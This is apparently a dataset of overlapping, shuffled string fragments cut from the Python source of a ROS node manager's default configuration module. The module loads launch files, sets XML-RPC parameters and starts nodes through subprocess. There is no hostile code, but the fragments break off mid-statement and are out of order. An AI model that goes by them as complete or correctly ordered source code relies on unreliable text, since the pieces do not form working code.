"xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params to prevent",
"if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format,",
"current working path, Default: the package of the node cwd = self.get_ros_home() if",
"to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending",
"machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items():",
"roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']:",
"ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace =",
"'capability_group' parameter found, assign node to the group if cap_param in self.roscfg.params and",
"self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not",
"add new group in the namespace of the node if ns not in",
"ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] =",
"# # * Redistributions of source code must retain the above copyright #",
"rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result = {'max': 0,",
"['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry",
"@rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))}",
"in afilter: if a.startswith(f): in_filter = True break if ':=' not in a",
"# add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri",
"of the launch file @type path: C{str} @param package: the package containing the",
"not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace,",
"self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] >",
"autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The first one",
"machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not",
"= [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] =",
"pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = ''",
"'.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try:",
"'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name =",
"if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type =",
"# if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] #",
"copyright # notice, this list of conditions and the following disclaimer. # *",
"import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n",
"list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if",
"with given name from the currently loaded configuration. @param node: the name of",
"added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the",
"'' dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if",
"in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s:",
"= rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value)",
"# for code, msg, _ in r: # if code != 1: #",
"= ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s'",
"start_now: # Start the timer for waiting for the topic start_timer = threading.Timer(3.,",
"''' params = dict() for param, value in self.roscfg.params.items(): params[param] = value #",
"remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri",
"0: start_now = False # start timer for delayed start start_timer = threading.Timer(start_delay,",
"# printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg,",
"containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes =",
"pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as",
"a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending",
"{'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node,",
"launch file is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file)",
"launch file. If package is given, try first to find the launch file",
"self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except",
"val: str @return: the decoded string @rtype: C{unicode} or original on error '''",
"about a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService =",
"take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file",
"== node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign",
"capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images':",
"p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and",
"License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> #",
"two separate loops, to create the description list first for param, p in",
"if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd =",
"# remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current",
"return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the",
"afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv:",
"update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else:",
"'' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find",
"not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes':",
"False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and",
"StartException: if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n",
"# load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize",
"file in the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths)",
"tacked. @param path: the file name of the launch file @type path: C{str}",
"def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for",
"ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not",
"try first to find the launch file in the given package. If more",
"= dict() if self.roscfg is not None: # get the capabilities description #",
"= None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes",
"if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type',",
"(str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd)",
"'''@ivar: robot description as tupel of (type, name, text) ''' self.package = ''",
"capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name",
"args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not",
"the node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd ==",
"in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded",
"description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr",
"class LoadException(Exception): ''' The exception throwing while searching for the given launch file.",
"self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename)",
"service to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self,",
"threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass #",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self,",
"str, 'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr =",
"cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd",
"if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap",
"elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn",
"is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self,",
"# rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService",
"if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg",
"NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR",
"# print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes:",
"given file is not found ''' launch_file = path # if package is",
"= dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value",
"Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import",
"self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of (type, name,",
"package, the first one will be tacked. @param path: the file name of",
"conditions and the following disclaimer. # * Redistributions in binary form must reproduce",
"are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this",
"topic: start_now = True break if not start_now: # Start the timer for",
"param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params",
"= [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ',",
"start_required: start_now = False # get published topics from ROS master master =",
"launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in",
"distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri()",
"get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type",
"self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the",
"print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load",
"# from this software without specific prior written permission. # # THIS SOFTWARE",
"'%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] =",
"self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if",
"item break if n is None: raise StartException(\"Node '%s' not found!\" % node)",
"= roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and not",
"# , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import",
"this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes'",
"ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required ==",
"in params.itervalues(): # suppressing this as it causes too much spam # printlog(\"setting",
"# suppressing this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key)",
"rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if n is",
"if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call",
"# multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues():",
"= '' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file =",
"if autostart and start_required: start_now = False # get published topics from ROS",
"respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace,",
"inform the caller about a new configuration. ''' self.listService = None '''@ivar: The",
"URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in",
"(n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args:",
"= True def runNode(self, node, autostart=False): ''' Start the node with given name",
"decode the string entry from system default coding to unicode. @param val: the",
"on each load of a launch file to inform the caller about a",
"in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0])",
"env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait",
"exception throwing while run a node containing in the loaded configuration. ''' pass",
"remove namespace from sys.argv to avoid load the launchfile info local namespace sys.argv",
"with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor",
"cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd",
"rights reserved. # # Redistribution and use in source and binary forms, with",
"0: raise StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd",
"if self.roscfg is not None: # get the capabilities description # use two",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA,",
"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY",
"'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with",
"server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let",
"the absolute path of the launch file @rtype: C{str} @raise LoadException: if the",
"XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy",
"launch file in the given package. If more then one launch file with",
"cmd = [cmd] if cmd is None or len(cmd) == 0: raise StartException('%s",
"# set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv)))",
"provided that the following conditions # are met: # # * Redistributions of",
"with or without # modification, are permitted provided that the following conditions #",
"view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() #",
"itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if",
"= self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name))",
"= rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if n",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND",
"n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0:",
"roslib.names.SEP # if the 'capability_group' parameter found, assign node to the group if",
"self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile info local",
"return [] # def rosservice_load_launch(self, req): # ''' # Load the launch file",
"= None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname ==",
"= {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime =",
"import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess import",
"self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv =",
"= roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter in",
"try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n,",
": str, 'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr",
"groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns # add",
"delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if",
"str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg",
"C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} '''",
"''' Loads all parameter into ROS parameter server. ''' params = dict() for",
"if n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s'",
"onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as",
"node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and",
"% (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to",
"not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns",
"[] # def rosservice_load_launch(self, req): # ''' # Load the launch file #",
"in argv: in_filter = False for f in afilter: if a.startswith(f): in_filter =",
"sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description",
"[(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar:",
"Redistributions in binary form must reproduce the above # copyright notice, this list",
"launch file to inform the caller about a new configuration. ''' self.description_response =",
"self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback #",
"= rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\"",
"distribution. # * Neither the name of Fraunhofer nor the names of its",
"Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and use in",
"(path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get",
"[cmd] if cmd is None or len(cmd) == 0: raise StartException('%s in package",
"''' self.package = '' self.file = '' self.__lock = threading.RLock() # Load parameter",
"Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images'])",
"License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved.",
"def getPath(self, path, package=''): ''' Searches for a launch file. If package is",
"capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str,",
"def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API. @return:",
"same name found in the package, the first one will be tacked. @param",
"False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process",
"= param_server_multi() # for code, msg, _ in r: # if code !=",
"True break if not added: ns = cap_ns # add new group in",
"add node environment parameter for k, v in n.env_args: new_env[k] = v #",
"group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type",
"n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader",
"containing the launch file or an empty string, if the C{file} is an",
"\"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError:",
"respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args",
"@type val: str @return: the decoded string @rtype: C{unicode} or original on error",
"added = True break if not added: ns = cap_ns # add new",
"= entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get",
"self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT",
"AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback',",
"expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for",
"the current working path, Default: the package of the node cwd = self.get_ros_home()",
"= {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\",",
"except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic =",
"__init__(self): self.nodes = [] '''@ivar: the list with names of nodes with name",
"n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by",
"timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False))",
"avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts",
"self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename):",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES",
"the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback",
"result def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock:",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic):",
"entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get",
"Replaces the '\\\\n' by LF (Line Feed) and decode the string entry from",
"remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k",
"# env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the",
"if the parameter group parameter found, assign node to the group if not",
"is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the",
"# masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost': #",
"by LF (Line Feed) and decode the string entry from system default coding",
"type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot",
"endorse or promote products derived # from this software without specific prior written",
"if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return",
"# raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable",
"isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected:",
"{'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item",
"to find the launch file in the given package. If more then one",
"set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:=']",
"'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '',",
"cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are",
"'capability_group') cap_ns = node_fullname # find the capability group parameter in namespace while",
"C{file} is an absolute path @type package: C{str} @return: the absolute path of",
"given name from the currently loaded configuration. @param node: the name of the",
"bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try:",
"configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService",
"of the node @type node: C{str} @raise StartException: if an error occurred while",
"p) r = param_server_multi() # for code, msg, _ in r: # if",
"'''@ivar: the list with names of nodes with name spaces.''' self.sensors = {}",
"not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS",
"'_launch_file:='] result = [] for a in argv: in_filter = False for f",
"must retain the above copyright # notice, this list of conditions and the",
"= group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes =",
"for autostart required topic `%s` is ignored!' % topic) topic = '' elif",
"* Redistributions in binary form must reproduce the above # copyright notice, this",
"or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result =",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE.",
"argv: in_filter = False for f in afilter: if a.startswith(f): in_filter = True",
"0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay']))",
"raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result types",
"paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s]",
"error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code,",
"ns = cap_ns # add new group in the namespace of the node",
"(BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights",
"self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd =",
"threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and",
"f in afilter: if a.startswith(f): in_filter = True break if ':=' not in",
"len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param)",
"n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0])",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\"",
"[] def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def",
"= self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if",
"are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd,",
"== 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args:",
"used to endorse or promote products derived # from this software without specific",
"import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call",
"% self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if",
"self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load',",
"self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name,",
"much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for",
"@type node: C{str} @raise StartException: if an error occurred while start. ''' if",
"of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name",
"not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1]",
"Loads all parameter into ROS parameter server. ''' params = dict() for param,",
"if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for",
"traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file. If",
"in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in cpp",
"is an absolute path @type package: C{str} @return: the absolute path of the",
"autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is",
"thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the",
"ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import",
"''' The exception throwing while searching for the given launch file. ''' pass",
"ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created on each",
"[], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the",
"master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic:",
"rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import",
"''' self.listService = None '''@ivar: The service will be created on each load",
", LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os",
"except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try:",
"get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS",
"= rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri()",
"default @type val: str @return: the decoded string @rtype: C{unicode} or original on",
"self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)",
"import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex import",
"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER",
"std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be",
"remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending",
"None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd",
